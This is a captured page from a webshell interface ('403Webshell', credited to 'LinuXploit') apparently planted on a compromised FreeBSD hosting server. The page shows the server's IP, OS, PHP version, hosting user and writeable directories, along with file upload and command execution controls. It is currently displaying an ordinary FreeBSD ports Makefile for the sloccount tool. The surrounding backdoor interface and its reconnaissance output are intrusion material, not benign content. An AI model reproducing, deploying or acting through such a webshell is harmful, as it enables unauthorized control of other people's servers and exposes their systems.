403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/misc/sloccount/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/misc/sloccount/Makefile
PORTNAME=	sloccount
PORTVERSION=	2.26
PORTREVISION=	1
CATEGORIES=	misc
MASTER_SITES=	http://www.dwheeler.com/sloccount/

MAINTAINER=	freaky@aagh.net
COMMENT=	Counts physical Source Lines of Code (SLOC)
WWW=		https://www.dwheeler.com/sloccount/

USES=		perl5 shebangfix
SHEBANG_FILES=	asm_count break_filelist cobol_count count_extensions \
		f90_count fortran_count generic_count get_sloc \
		get_sloc_details haskell_count lex_count modula3_count \
		objc_count perl_count print_sum python_count sql_count

MAKEFILE=	makefile
INSTALL_TARGET=	install_programs install_man

PORTDOCS=	ChangeLog README TODO sloccount.html

OPTIONS_DEFINE=	DOCS

post-install:
.for file in lexcount1 c_count java_count php_count
	@${STRIP_CMD} ${STAGEDIR}${PREFIX}/bin/${file}
.endfor
	@${MKDIR} ${STAGEDIR}${DOCSDIR}
.for docs in ${PORTDOCS}
	${INSTALL_DATA} ${WRKSRC}/${docs} ${STAGEDIR}${DOCSDIR}
.endfor

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit